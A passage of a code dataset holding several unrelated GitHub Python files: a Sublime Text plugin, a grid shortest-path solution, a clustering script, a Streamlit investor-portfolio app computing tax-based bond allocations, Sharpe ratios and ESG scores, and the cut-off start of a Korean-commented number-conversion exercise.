props):\n if other_ent in self.other_entity:\n raise Exception(\"Duplicate edge.\")\n \n edge = EntityEdge(self.vertex, other_ent.vertex, props, self.dggraph)\n self.other_entity.add(other_ent)\n self.other_entity_edges.add(edge)\n other_ent.other_entity.add(self)\n other_ent.other_entity.add(edge)","repo_name":"toogiii/TermsForTerms","sub_path":"TermsForTerms/src/termsforterms/EntityNode.py","file_name":"EntityNode.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2963515282","text":"import os\nimport sys\nimport sublime\nimport sublime_plugin\nimport re\nimport json\nfrom xml.dom.minidom import parseString\nfrom xml.parsers.expat import ExpatError, errors\nfrom os.path import basename, splitext\n\nsqattop = 1;\n\nclass sqopenincludeCommand(sublime_plugin.WindowCommand):\n\n\tdef run(self):\n\t\tprint(\"openInclude\");\n\t\tview = self.window.active_view()\n\t\tword = view.line(view.sel()[0])\n\t\twordtext = view.substr(word)\n\t\tprint(wordtext)\n\nclass sqformatcodeCommand(sublime_plugin.TextCommand):\n\n\tdef __init__(self,view):\n\t\t self.view=view;\n\t\t self.language=self.get_language()\n\n\tdef get_language(self):\n\t\tsyntax = self.view.settings().get('syntax')\n\t\tlanguage = splitext(basename(syntax))[0].lower() if syntax is not None else \"plain text\"\n\t\treturn language\n\n\tdef get_text_type(self):\n\t\tlanguage = self.language;\n\t\t#print(language);\n\t\tif language == 'xml':\n\t\t\treturn 'xml'\n\t\tif language == 'json':\n\t\t\treturn 'json'\n\t\tif language == 'php':\n\t\t \treturn 'php'\n\t\tif language == 'c++':\n\t\t \treturn 'c++'\n\t\tif language == 'c':\n\t\t \treturn 'c++'\n\t\tif language == \"merlin\":\n\t\t\treturn \"merlin\"\n\t\tif language == 'plain text' and s:\n\t\t\tif s[0] == '<':\n\t\t\t\treturn 'xml'\n\t\t\t\tif s[0] == '{' or s[0] == '[':\n\t\t\t\t\treturn 'json'\n\t\treturn 'notsupported'\n\n\tdef run(self,edit):\n\t\ttext_type = self.get_text_type();\n\t\t#print(text_type);\n\t\tif (text_type == 'php') :\n\t\t\tprint('phpfmt')\n\t\t\tself.view.run_command(\"fmt_now\")\n\t\tif (text_type == 'c++') :\n\t\t\tprint('astyleformat');\n\t\t\tself.view.run_command(\"astyleformat\")\n\t\tif (text_type == 'json') :\n\t\t\tprint('IndentXML')\n\t\t\tself.view.run_command(\"auto_indent\")\n\t\t\tself.view.run_command(\"json_comma\")\n\t\t\tself.view.run_command(\"pretty_json\")\n\t\tif (text_type == 'xml') :\n\t\t\tprint('IndentXML')\n\t\t\tself.view.run_command(\"auto_indent\")\n\t\tif (text_type == 'merlin') :\n\t\t\tprint('syn: merlin')\n\t\t\tself.view.run_command(\"sqmerlin\")\n\nclass sqfindCommand(sublime_plugin.WindowCommand):\n\n\tdef run(self):\n\t\tglobal sqattop;\n\t\tif (sqattop != 0 ) :\n\t\t\tsqattop=0;\n\t\t\tself.window.run_command(\"show_panel\", {\"panel\": \"find\", \"reverse\": False});\n\t\telse:\n\t\t\tself.window.run_command(\"hide_panel\", {\"panel\": \"find\", \"reverse\": False});\n\t\t\tself.window.run_command(\"find_next\");\n\t\t\tsqattop=0;\n\nclass sqconsoleCommand(sublime_plugin.WindowCommand):\n\n\tdef run(self):\n\t\tself.window.run_command(\"show_panel\", {\"panel\": \"console\", \"toggle\": True});\n\nclass sqbeginCommand(sublime_plugin.TextCommand):\n\n\tdef run(self, edit):\n\t\tglobal sqattop;\n\t\tself.view.run_command(\"move_to\", {\"to\": \"bof\", \"extend\": False});\n\t\tsqattop=1;\n\nclass sqselectCommand(sublime_plugin.WindowCommand):\n\n\tdef run(self):\n\t\tglobal sqattop;\n\t\twindow=self.window;\n\t\tview=window.active_view();\n\t\tsel=view.sel();\n\t\tregion=sel[0];\n\t\tsz=region.size();\n\t\tif (sz>0) :\n\t\t view.run_command(\"expand_selection\", {\"to\": \"line\"})\n\t\telse:\n\t\t view.run_command(\"move\", {\"by\": \"pages\", \"forward\": True});\n\t\nclass sqcloseotherCommand(sublime_plugin.WindowCommand):\n def run(self):\n \tself.run_command(\"toggle_side_bar\");","repo_name":"marketideas/sublime_sq","sub_path":"sublime_sq.py","file_name":"sublime_sq.py","file_ext":"py","file_size_in_byte":2968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11126061973","text":"# s=121\n# r=str(s)\n# for i in len(s):\n# for j in \n# if r[i] int:\n M = len(grid)\n N = len(grid[0])\n \n seen = set()\n \n queue = collections.deque()\n queue.append([0,0,0])\n count = 0\n \n while queue:\n # print(count,queue)\n for q in range(len(queue)):\n x,y,k = queue.popleft()\n \n if x == M-1 and y == N-1:\n print(k)\n return count \n \n if (x,y,k) in seen:\n continue\n \n seen.add((x,y,k))\n \n for m,n in (x+1,y),(x,y+1),(x-1,y),(x,y-1):\n if 0<=m 4: # k = 4\r\n for i in clusters:\r\n if data[0][0] in i and data[0][1] not in i:\r\n for j in clusters:\r\n if data[0][1] in j:\r\n i += j\r\n clusters.remove(j)\r\n break\r\n break\r\n elif data[0][1] in i and data[0][0] not in i:\r\n for j in clusters:\r\n if data[0][0] in j:\r\n i += j\r\n clusters.remove(j)\r\n break\r\n break\r\n data.pop(0)\r\n \r\nprint(clusters)\r\n\r\nflag = False\r\nfor i in range(len(data)):\r\n for j in clusters:\r\n if (data[i][0] in j and data[i][1] not in j) or (data[i][1] in j and data[i][0] not in j):\r\n print(data[i][2])\r\n flag = True\r\n break\r\n if flag:\r\n break\r\n ","repo_name":"shivamzaz/Python_Practice","sub_path":"2_1.py","file_name":"2_1.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4978766314","text":"################################################################################\r\n# Step 1 - Financial tax information:\r\n# Import personal tax information from 'financial_information.py' (or whatever the file is called) script into the file \"investor_portfolio\"\r\n# which contains code for Investor Portfolio's customer interface in order to add wallet operations to the\r\n# application. We will provide the investors account information to the application.\r\n\r\n# Step 2 - Crypto wallet:\r\n# Within the Streamlit sidebar section of code, create a variable named `account`. Set this variable equal to a call on the `generate_account`\r\n# function. This function will create the Investor Portfolio customer's account and will contain their wallet information. Additionally within\r\n# this section, there will be an `st.sidebar.write` function that will display the balance of the customer’s account.\r\n\r\n################################################################################\r\n# Imports\r\nimport hvplot.pandas\r\nimport matplotlib as plt\r\nimport pandas_datareader as pdr\r\nimport alpaca_trade_api as alpaca\r\nfrom dotenv import load_dotenv\r\nimport requests\r\nimport json\r\nimport urllib.request\r\nimport calendar\r\nimport yesg\r\nimport streamlit as st\r\nfrom dataclasses import dataclass\r\nimport plotly.figure_factory as ff\r\nfrom datetime import datetime\r\nimport os\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom typing import Any, List\r\nimport pandas as pd\r\nimport urllib.request\r\nimport plotly.express as px\r\nmunis = pd.read_csv('municipal_bonds.csv')\r\ntreas = pd.read_csv('treasury_bonds.csv')\r\n\r\n\r\n\r\n# Importing the functions for other .py files\r\n#from crypto_wallet_information import generate_crypto_account, get_balance\r\n#from tax import investor_tax_rate\r\n\r\nst.title(\"Investor Portfolio\")\r\nst.markdown(\"### Financial areas recommended to invest in based on your financial background.\")\r\nst.sidebar.write('Welcome!')\r\nst.sidebar.image(\"Images/stock_image_pixabay.jpg\")\r\n\r\n# Creating the drop down menu options located on the sidebar. If/else will used to choose either \"Tax Portfolio\", \"Sentiment Analysis Model\" or \"Twitter Sentiment Analysis\".\r\n\r\ndrop_down = [\"Tax Portfolio\", \"Sentiment Analysis Model\", \"Twitter Sentiment Analysis\"]\r\noptions = st.sidebar.selectbox(\"Select from the following options:\", drop_down)\r\n\r\n# Creating the interactive buttons for name, age, and income\r\n\r\nif options == 'Tax Portfolio':\r\n st.sidebar.success(\"2021 Tax Portfolio Summary\")\r\n st.write('Here is a brief summary of your 2021 Tax Portfolio.')\r\n\r\n investor_input = st.text_input(\"Enter your name:\", \" \")\r\n if(st.button('Submit')):\r\n result = investor_input.title()\r\n st.success(result)\r\n\r\n age_response= st.number_input(\"Enter your age:\" , 0 , 100)\r\n if(st.button('Submit', key = 0)):\r\n result_age = age_response\r\n st.success(result_age)\r\n\r\n income_response = st.number_input(\"Enter your annual income (if married, please respond the joint annual income):\", 0, 10000000)\r\n if(st.button('Submit', key = 1)):\r\n result_income = income_response\r\n st.success(result_income)\r\n\r\n if not investor_input:\r\n pass\r\n\r\n# Creating the drop down menu options if 'Tax Portfolio' is selected. If/else will used to choose either 'Breakdown of Portfolio' or 'Portfolio Plot'.\r\n\r\n else:\r\n st.markdown('Select from the drop down menu:')\r\n selected_options = st.selectbox(\"\", options=['Select an option','Breakdown of Portfolio', 'Portfolio Plot'], index=0)\r\n if selected_options == 'Breakdown of Portfolio':\r\n st.write('Information of the investor will be displayed here!')\r\n\r\n### *** FROM tax.ipynb *** Calculating tax-yield and annual return for the portfolio ###\r\n\r\n if income_response >= 0 and income_response <= 10275:\r\n tax_rate = .10\r\n elif income_response >= 10275 and income_response < 41775:\r\n tax_rate = .12\r\n elif income_response >= 41775 and income_response < 89075:\r\n tax_rate = .22\r\n elif income_response >= 89075 and income_response < 170050:\r\n tax_rate = .24\r\n elif income_response >= 170050 and income_response < 215950:\r\n tax_rate = .32\r\n elif income_response >= 215950 and income_response < 539900:\r\n tax_rate = .35\r\n elif income_response >= 539900:\r\n tax_rate = .37\r\n\r\n st.write(\"Here is your tax rate:\", tax_rate)\r\n\r\n treas_tax_equivalet_yield = (munis['Coupon']) / (1-tax_rate)\r\n munis_vs_treas = pd.DataFrame(treas_tax_equivalet_yield)\r\n munis_vs_treas = pd.DataFrame(munis[['Issuer Name', 'CUSIP', 'Coupon']])\r\n\r\n munis_vs_treas['treasury_equivalet_yield'] = treas_tax_equivalet_yield\r\n st.write(\"Here is a DataFrame created based on your tax rate to calculate your tax-equivalent yield:\", munis_vs_treas)\r\n\r\n\r\n # Getting the treas_weight and muni_weight from the tax_rate\r\n\r\n treas_weight = 0\r\n muni_weight = 0\r\n\r\n if tax_rate == .10 or tax_rate == .12:\r\n treas_weight = .100\r\n muni_weight = 0\r\n if tax_rate == .22 or tax_rate == .24 or tax_rate == .32:\r\n treas_weight = .50\r\n muni_weight = .50\r\n if tax_rate == .35 or tax_rate == .37:\r\n treas_weight = 0\r\n muni_weight = .100\r\n\r\n st.write(\"The portfolio weight for treasury bonds should be\",\r\n treas_weight * 100, \"% since your income tax rate is:\", tax_rate)\r\n st.write(\"The portfolio weight for municipal bonds should be\",\r\n muni_weight * 100, \"% since your income tax rate is:\", tax_rate)\r\n\r\n\r\n # Getting the equity_allocation, fixed_income_allocation and fixed_return\r\n\r\n equity_allocation = 100 - age_response\r\n st.write(\"Equity allocation:\", equity_allocation)\r\n\r\n fixed_allocation = 100 - equity_allocation\r\n st.write(\"Fixed income allocation:\", fixed_allocation)\r\n\r\n treas_yield_chosen = np.mean(munis_vs_treas['treasury_equivalet_yield'])\r\n muni_yield_chosen = np.mean(munis_vs_treas['Coupon'])\r\n\r\n fixed_allocation_return = (\r\n treas_weight * treas_yield_chosen) + (muni_weight * muni_yield_chosen)\r\n st.write(\"Fixed return:\", fixed_allocation_return)\r\n\r\n equity_annual_return = .27\r\n\r\n # Getting the annual_return\r\n\r\n portfolio_annual_return = (equity_allocation / 100) * equity_annual_return + (\r\n fixed_allocation/100) * ((fixed_allocation_return * 2)/100)\r\n st.write(\"Your annual portfolio return is:\",\r\n portfolio_annual_return)\r\n\r\n### *** FROM tax.ipynb *** Calculating tax-yield and annual return for the portfolio ###\r\n\r\n elif selected_options == 'Portfolio Plot':\r\n # Sample data from https://docs.streamlit.io/library/api-reference/charts/st.plotly_chart\r\n \r\n equity_allocation = 100 - age_response\r\n fixed_allocation = 100 - equity_allocation\r\n equity_annual_return = .27\r\n\r\n # Add allocation data\r\n x1 = equity_allocation\r\n x2 = fixed_allocation\r\n \r\n # Group data together\r\n pie_data = [x1, x2]\r\n group_labels = ['Equity Allocation','Fixed Allocation']\r\n\r\n # Pie Chart Plot of test Tickers\r\n pie_chart = px.pie( values=pie_data, names=group_labels, title='Pie Chart of Allocations')\r\n st.plotly_chart(pie_chart, use_container_width=True)\r\n\r\n\r\n\r\nelif options == 'Sentiment Analysis Model':\r\n st.sidebar.success(\"Trending Stocks or Coins\")\r\n st.write('Here is a fundamental analysis for the following selected stock or coin.')\r\n #investor_input = ''\r\n \r\n st.markdown('Type in the ** Ticker Symbol ** for the given ** Stock** or ** Coin **')\r\n investor_input = st.text_input('') \r\n if(st.button('Submit', key=4)):\r\n result_ticker_symbol = investor_input\r\n st.success(result_ticker_symbol)\r\n \r\n if not investor_input:\r\n pass\r\n else: \r\n st.markdown('Select from the drop down menu if the ticker symbol is a stock or coin:') \r\n selected_options = st.selectbox(\"\", options = ['Select an option','Stock', 'Crypto'], index=0)\r\n if selected_options == 'Stock':\r\n st.markdown('Displayed **Stock** Information')\r\n st.write('Select a ** timeframe ** for the selected ** stock ** to get a fundamental analysis breakdown.')\r\n st.markdown('Select a Start Date:')\r\n start_date = st.date_input(\"\", datetime(2020, 1, 1))\r\n st.write('Selected date:', start_date)\r\n\r\n\r\n### *** FROM ESG_DATA.ipynb *** Downloads historic ESG ratings and returns it as a dataframe (7 years) ###\r\n\r\n sp_500 = pd.read_csv('sandp500.csv')\r\n headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) '\r\n 'Chrome/50.0.2661.102 Safari/537.36'}\r\n\r\n response = requests.get('https://query2.finance.yahoo.com/v1/finance/esgChart', params={\"symbol\": investor_input},\r\n headers=headers)\r\n\r\n try:\r\n df = pd.DataFrame(\r\n response.json()[\"esgChart\"][\"result\"][0][\"symbolSeries\"])\r\n df[\"Date\"] = pd.to_datetime(df[\"timestamp\"], unit=\"s\")\r\n\r\n df = df.rename(columns={\"esgScore\": \"Total-Score\", \"environmentScore\": \"E-Score\", \"socialScore\": \"S-Score\",\r\n \"governanceScore\": \"G-Score\"})\r\n df[\"Ticker\"] = investor_input\r\n \r\n st.write('DataFrame for Total Score and ESG Scores from the past 7 years:', investor_input)\r\n st.write(df[['Date', 'Total-Score', 'E-Score', 'S-Score', 'G-Score', 'Ticker']].set_index('Date'))\r\n\r\n except:\r\n st.write('An error has occurred. The ticker symbol might be wrong or you might need to wait to continue.')\r\n\r\n \r\n\r\n### *** FROM ESG_DATA.ipynb *** Downloads historic ESG ratings and returns it as a dataframe (7 years) ###\r\n\r\n\r\n### *** FROM portfolio analysis v2.ipynb *** Gives the portfolio annual return, portfolio annual SD, portfolio sharpe ratio, total ESG score ###\r\n\r\n st.write('Insert test or using Twitter Sentiment DataFrame:')\r\n \r\n test = [['JPM', 50], ['SBAC', 12], ['GOOGL', 39], ['TSLA', 100], ['GPN', 22]]\r\n df_test = pd.DataFrame(test, columns=['Ticker', 'Sentiment'])\r\n #st.write(df_test)\r\n\r\n # Insert test or twitter sentiment dataframe\r\n df_portfolio = df_test[['Ticker', 'Sentiment']]\r\n df_portfolio = df_portfolio.sort_values(by=['Sentiment'], ascending=False)\r\n df_portfolio = df_portfolio.reset_index()\r\n df_portfolio = df_portfolio.drop(['index'], axis=1)\r\n\r\n # Calculate the total number of sentiments\r\n sentiment_sum = df_portfolio['Sentiment'].sum()\r\n st.write('Total number of Sentiments:', sentiment_sum)\r\n\r\n # Calculate the weights for each ticker\r\n df_portfolio['weights'] = df_portfolio['Sentiment']/sentiment_sum\r\n\r\n\r\n # Pie Chart Plot of test Tickers\r\n pie_chart = px.pie(data_frame=df_portfolio, values= 'weights', names='Ticker', title='Pie Chart of Sentiments')\r\n st.plotly_chart(pie_chart, use_container_width=True)\r\n\r\n # Naming tickers\r\n df_portfolio['weights'].sum()\r\n\r\n ticker_0 = df_portfolio.loc[0, 'Ticker']\r\n ticker_1 = df_portfolio.loc[1, 'Ticker']\r\n ticker_2 = df_portfolio.loc[2, 'Ticker']\r\n ticker_3 = df_portfolio.loc[3, 'Ticker']\r\n ticker_4 = df_portfolio.loc[4, 'Ticker']\r\n\r\n #Set start and end date for the API calls\r\n start_date = pd.Timestamp('2010-08-01', tz='America/New_York').isoformat()\r\n end_date = pd.Timestamp('2021-11-23', tz='America/New_York').isoformat()\r\n\r\n # INDEX 0: Make API call and populate dataframe with Close, and Daily Return info\r\n df_0 = pdr.DataReader(ticker_0, 'yahoo', start_date, end_date)\r\n df_0 = df_0['Close']\r\n df_0 = pd.DataFrame(df_0)\r\n df_0['Daily Return'] = df_0['Close'].pct_change()\r\n df_0 = df_0.dropna()\r\n\r\n #INDEX 0: Calculate annual return, annual standard deviation and Sharpe Ratio\r\n\r\n # META NOTE: Because Facebook changed their name, the ticker META doesn't have\r\n #the same amount of historical data\r\n\r\n df_0['Annual Return'] = df_0['Daily Return'].rolling(window=252).mean()\r\n df_0['Annual SD'] = df_0['Daily Return'].rolling(window=252).std()*np.sqrt(252)\r\n df_0['Sharpe Ratio'] = (df_0['Annual Return']-.02)/df_0['Annual SD']\r\n df_0 = df_0.dropna()\r\n \r\n\r\n # INDEX 1: Make API call and populate dataframe with Close, and Daily Return info\r\n df_1 = pdr.DataReader(ticker_1, 'yahoo', start_date, end_date)\r\n df_1 = df_1['Close']\r\n df_1 = pd.DataFrame(df_1)\r\n df_1['Daily Return'] = df_1['Close'].pct_change()\r\n df_1 = df_1.dropna()\r\n\r\n #INDEX 1: Calculate annual return, annual standard deviation and Sharpe Ratio\r\n df_1['Annual Return'] = df_1['Daily Return'].rolling(window=252).mean()*252\r\n df_1['Annual SD'] = df_1['Daily Return'].rolling(window=252).std()*np.sqrt(252)\r\n df_1['Sharpe Ratio'] = (df_1['Annual Return']-.02)/df_1['Annual SD']\r\n df_1 = df_1.dropna()\r\n\r\n # INDEX 2: Make API call and populate dataframe with Close, and Daily Return info\r\n df_2 = pdr.DataReader(ticker_2, 'yahoo', start_date, end_date)\r\n df_2 = df_2['Close']\r\n df_2 = pd.DataFrame(df_2)\r\n df_2['Daily Return'] = df_2['Close'].pct_change()\r\n df_2 = df_2.dropna()\r\n \r\n #INDEX 2: Calculate annual return, annual standard deviation and Sharpe Ratio\r\n df_2['Annual Return'] = df_2['Daily Return'].rolling(window=252).mean()*252\r\n df_2['Annual SD'] = df_2['Daily Return'].rolling(window=252).std()*np.sqrt(252)\r\n df_2['Sharpe Ratio'] = (df_2['Annual Return']-.02)/df_2['Annual SD']\r\n df_2 = df_2.dropna()\r\n\r\n # INDEX 3: Make API call and populate dataframe with Close, and Daily Return info\r\n df_3 = pdr.DataReader(ticker_3, 'yahoo', start_date, end_date)\r\n df_3 = df_3['Close']\r\n df_3 = pd.DataFrame(df_3)\r\n df_3['Daily Return'] = df_3['Close'].pct_change()\r\n df_3 = df_3.dropna()\r\n\r\n #INDEX 3: Calculate annual return, annual standard deviation and Sharpe Ratio\r\n df_3['Annual Return'] = df_3['Daily Return'].rolling(window=252).mean()*252\r\n df_3['Annual SD'] = df_3['Daily Return'].rolling(window=252).std()*np.sqrt(252)\r\n df_3['Sharpe Ratio'] = (df_3['Annual Return']-.02)/df_3['Annual SD']\r\n df_3 = df_3.dropna()\r\n \r\n\r\n # INDEX 4: Make API call and populate dataframe with Close, and Daily Return info\r\n df_4 = pdr.DataReader(ticker_4, 'yahoo', start_date, end_date)\r\n df_4 = df_4['Close']\r\n df_4 = pd.DataFrame(df_4)\r\n df_4['Daily Return'] = df_4['Close'].pct_change()\r\n df_4 = df_4.dropna()\r\n \r\n \r\n #INDEX 4: Calculate annual return, annual standard deviation and Sharpe Ratio\r\n df_4['Annual Return'] = df_4['Daily Return'].rolling(window=252).mean()*252\r\n df_4['Annual SD'] = df_4['Daily Return'].rolling(window=252).std()*np.sqrt(252)\r\n df_4['Sharpe Ratio'] = (df_4['Annual Return']-.02)/df_4['Annual SD']\r\n df_4 = df_4.dropna()\r\n\r\n # Add annual return for each ticker to portfolio dataframe\r\n\r\n df_portfolio.loc[0, 'Annual Return'] = df_0.loc['2021-11-23', 'Annual Return']\r\n df_portfolio.loc[1, 'Annual Return'] = df_1.loc['2021-11-23', 'Annual Return']\r\n df_portfolio.loc[2, 'Annual Return'] = df_2.loc['2021-11-23', 'Annual Return']\r\n df_portfolio.loc[3, 'Annual Return'] = df_3.loc['2021-11-23', 'Annual Return']\r\n df_portfolio.loc[4, 'Annual Return'] = df_4.loc['2021-11-23', 'Annual Return']\r\n \r\n\r\n # Add annual standard deviation for each ticker to portfolio dataframe\r\n\r\n df_portfolio.loc[0, 'Annual SD'] = df_0.loc['2021-11-23', 'Annual SD']\r\n df_portfolio.loc[1, 'Annual SD'] = df_1.loc['2021-11-23', 'Annual SD']\r\n df_portfolio.loc[2, 'Annual SD'] = df_2.loc['2021-11-23', 'Annual SD']\r\n df_portfolio.loc[3, 'Annual SD'] = df_3.loc['2021-11-23', 'Annual SD']\r\n df_portfolio.loc[4, 'Annual SD'] = df_4.loc['2021-11-23', 'Annual SD']\r\n \r\n\r\n # Add the Sharpe Ratio for each ticker to portfolio dataframe\r\n\r\n df_portfolio.loc[0, 'Sharpe Ratio'] = df_0.loc['2021-11-23', 'Sharpe Ratio']\r\n df_portfolio.loc[1, 'Sharpe Ratio'] = df_1.loc['2021-11-23', 'Sharpe Ratio']\r\n df_portfolio.loc[2, 'Sharpe Ratio'] = df_2.loc['2021-11-23', 'Sharpe Ratio']\r\n df_portfolio.loc[3, 'Sharpe Ratio'] = df_3.loc['2021-11-23', 'Sharpe Ratio']\r\n df_portfolio.loc[4, 'Sharpe Ratio'] = df_4.loc['2021-11-23', 'Sharpe Ratio']\r\n \r\n # Create a dataframe to store the weighted values of each firm\r\n metric_weights = pd.DataFrame(df_portfolio['Ticker'])\r\n metric_weights['weights'] = df_portfolio['weights']\r\n metric_weights['Weighted Annual Return'] = df_portfolio['weights'] * \\\r\n df_portfolio['Annual Return']\r\n metric_weights['Weighted Annual SD'] = df_portfolio['weights'] * \\\r\n df_portfolio['Annual SD']\r\n metric_weights['Weighted Sharpe Ratio'] = df_portfolio['weights'] * \\\r\n df_portfolio['Sharpe Ratio']\r\n\r\n # Create a dataframe of portfolio metrics\r\n portfolio_metrics = pd.DataFrame(columns=['', 'Metric'])\r\n\r\n portfolio_metrics.loc[0] = 'Portfolio Annual Return'\r\n portfolio_metrics.loc[0,\r\n 'Metric'] = metric_weights['Weighted Annual Return'].sum()\r\n\r\n portfolio_metrics.loc[1] = 'Portfolio Annual SD'\r\n portfolio_metrics.loc[1, 'Metric'] = metric_weights['Weighted Annual SD'].sum()\r\n\r\n portfolio_metrics.loc[2] = 'Portfolio Sharpe Ratio'\r\n portfolio_metrics.loc[2, 'Metric'] = ((portfolio_metrics.loc[0, 'Metric']-.02)\r\n / portfolio_metrics.loc[1, 'Metric'])\r\n\r\n portfolio_metrics = portfolio_metrics.set_index('')\r\n \r\n portfolio_metrics['SP 500 Benchmark'] = np.nan\r\n\r\n # Make a dataframe for the SP 500 to use as a benchmark for the Twitter portfolio\r\n sp_500 = pdr.DataReader('^GSPC', 'yahoo', start_date, end_date)\r\n sp_500 = sp_500['Close']\r\n sp_500 = pd.DataFrame(sp_500)\r\n sp_500['Daily Return'] = sp_500['Close'].pct_change()\r\n sp_500 = sp_500.dropna()\r\n\r\n # Calculate metrics for the SP 500\r\n sp_500['Annual Return'] = sp_500['Daily Return'].rolling(window=252).mean()*252\r\n sp_500['Annual SD'] = sp_500['Daily Return'].rolling(\r\n window=252).std()*np.sqrt(252)\r\n sp_500['Sharpe Ratio'] = (sp_500['Annual Return']-.02)/sp_500['Annual SD']\r\n sp_500 = sp_500.dropna()\r\n\r\n # Put the SP 500 metrics into the portfolio metrics dataframe\r\n\r\n portfolio_metrics.loc['Portfolio Annual Return',\r\n 'SP 500 Benchmark'] = sp_500.loc['2021-11-23', 'Annual Return']\r\n portfolio_metrics.loc['Portfolio Annual SD',\r\n 'SP 500 Benchmark'] = sp_500.loc['2021-11-23', 'Annual SD']\r\n portfolio_metrics.loc['Portfolio Sharpe Ratio',\r\n 'SP 500 Benchmark'] = sp_500.loc['2021-11-23', 'Sharpe Ratio']\r\n\r\n # Import the csv file of ESG data\r\n\r\n esg = pd.read_csv('ESG_data.csv', parse_dates=True)\r\n\r\n # INDEX 0: Create ESG dataframe for each ticker in portfolio by selecting rows that contain the specific Ticker\r\n ticker_0_esg = esg[esg['Ticker'].str.contains(ticker_0)]\r\n ticker_0_esg['Date'] = pd.to_datetime(ticker_0_esg['Date'])\r\n ticker_0_esg = ticker_0_esg.set_index('Date')\r\n ticker_0_esg = ticker_0_esg.dropna()\r\n\r\n # INDEX 1: Create ESG dataframe for each ticker in portfolio by selecting rows that contain the specific Ticker\r\n ticker_1_esg = esg[esg['Ticker'].str.contains(ticker_1)]\r\n ticker_1_esg['Date'] = pd.to_datetime(ticker_1_esg['Date'])\r\n ticker_1_esg = ticker_1_esg.set_index('Date')\r\n ticker_1_esg = ticker_1_esg.dropna()\r\n\r\n # INDEX 2: Create ESG dataframe for each ticker in portfolio by selecting rows that contain the specific Ticker\r\n ticker_2_esg = esg[esg['Ticker'].str.contains(ticker_2)]\r\n ticker_2_esg['Date'] = pd.to_datetime(ticker_2_esg['Date'])\r\n ticker_2_esg = ticker_2_esg.set_index('Date')\r\n ticker_2_esg = ticker_2_esg.dropna()\r\n\r\n # INDEX 3: Create ESG dataframe for each ticker in portfolio by selecting rows that contain the specific Ticker\r\n ticker_3_esg = esg[esg['Ticker'].str.contains(ticker_3)]\r\n ticker_3_esg['Date'] = pd.to_datetime(ticker_3_esg['Date'])\r\n ticker_3_esg = ticker_3_esg.set_index('Date')\r\n ticker_3_esg = ticker_3_esg.dropna()\r\n\r\n # INDEX 4: Create ESG dataframe for each ticker in portfolio by selecting rows that contain the specific Ticker\r\n ticker_4_esg = esg[esg['Ticker'].str.contains(ticker_4)]\r\n ticker_4_esg['Date'] = pd.to_datetime(ticker_4_esg['Date'])\r\n ticker_4_esg = ticker_4_esg.set_index('Date')\r\n ticker_4_esg = ticker_4_esg.dropna()\r\n\r\n # Calculate the mean scores for the last available 12 months of ESG data to smooth out potential outliers\r\n\r\n yearly_esg_0 = ticker_0_esg.resample('Y').mean()\r\n yearly_esg_1 = ticker_1_esg.resample('Y').mean()\r\n yearly_esg_2 = ticker_2_esg.resample('Y').mean()\r\n yearly_esg_3 = ticker_3_esg.resample('Y').mean()\r\n yearly_esg_4 = ticker_4_esg.resample('Y').mean()\r\n\r\n #yearly_esg_4.iloc[-1:]\r\n\r\n df_portfolio['Total ESG'] = np.nan\r\n \r\n\r\n # Add the ESG scores to the portfolio dataframe\r\n\r\n df_portfolio.loc[0,'Total ESG'] = yearly_esg_0.loc['2021-12-31', 'Total-Score']\r\n df_portfolio.loc[1,'Total ESG'] = yearly_esg_1.loc['2021-12-31', 'Total-Score']\r\n df_portfolio.loc[2,'Total ESG'] = yearly_esg_2.loc['2021-12-31', 'Total-Score']\r\n df_portfolio.loc[3,'Total ESG'] = yearly_esg_3.loc['2021-12-31', 'Total-Score']\r\n df_portfolio.loc[4,'Total ESG'] = yearly_esg_4.loc['2021-12-31', 'Total-Score']\r\n\r\n\r\n # Apply the ESG scores to the metric weights dataframe\r\n\r\n metric_weights['Weighted Total ESG']= df_portfolio['weights']*df_portfolio['Total ESG']\r\n st.write('Portfolio Summary:', metric_weights)\r\n\r\n # Add the ESG metric to the portfolio metrics dataframe\r\n esg_row = pd.Series(['', ''])\r\n esg_row_df = pd.DataFrame([esg_row], index = ['Total ESG Score'], columns=['Metric','SP 500 Benchmark'])\r\n\r\n esg_row_df.loc['Total ESG Score','Metric'] = metric_weights['Weighted Total ESG'].sum()\r\n\r\n portfolio_metrics = pd.concat([portfolio_metrics, esg_row_df])\r\n\r\n \r\n st.write('Portfolio Summary:', portfolio_metrics)\r\n\r\n\r\n### *** FROM portfolio analysis v2.ipynb *** Gives the portfolio annual return, portfolio annual SD, portfolio sharpe ratio, total ESG score ###\r\n\r\n # TODO: Need to import a line graph (1 year) for the selected stock using an API\r\n\r\n elif selected_options == 'Crypto':\r\n st.markdown('Displayed ** Coin ** Information')\r\n st.write('Select a ** timeframe ** for the selected ** coin ** to get a fundamental analysis breakdown.')\r\n st.markdown('Select a Start Date')\r\n start_date = st.date_input(\"\", datetime(2020, 1, 1))\r\n st.write('Selected date:', start_date)\r\n\r\n\r\n\r\n # TODO: Need to import ESG score from the ESG_Data.file\r\n # TODO: Need to import a line graph (1 year) for the selected stock using an API\r\n \r\n\r\nelif options == 'Twitter Sentiment Analysis':\r\n st.write('Using information from Twitter to understand how to format our sharpe, calmar, sortino, treynor ratios for market evaluations.')\r\n st.sidebar.success(\"Trending on Twitter\")\r\n\r\n# Need to import information from TwitterSentimentAnalysis.ipynb and import the pie charts for this file here. \r\n","repo_name":"joebary/ESG_Twitter_Analysis_Project","sub_path":"investor_portfolio_v2.py","file_name":"investor_portfolio_v2.py","file_ext":"py","file_size_in_byte":25478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21898683392","text":"def solution(n):\r\n '''\r\n 단순 3진법이 아니라 3에 4가 오기 때문에 생각이 필요\r\n 몫과 나머지 이용하기 위해 divmod() 쓸 거임\r\n \r\n [4,1,2] 에서 나머지 index로 서서 삥삥 돌리는 방식\r\n \r\n 원래 3진법은 0,1,2만 옴 근데 이건 1,2,4가 옴\r\n \r\n n이 3의 배수가 아닐 때 :\r\n 그냥 3진법 쓰고 idx 적용하면 됨\r\n \r\n n이 3의 배수일 때 : \r\n 3으로 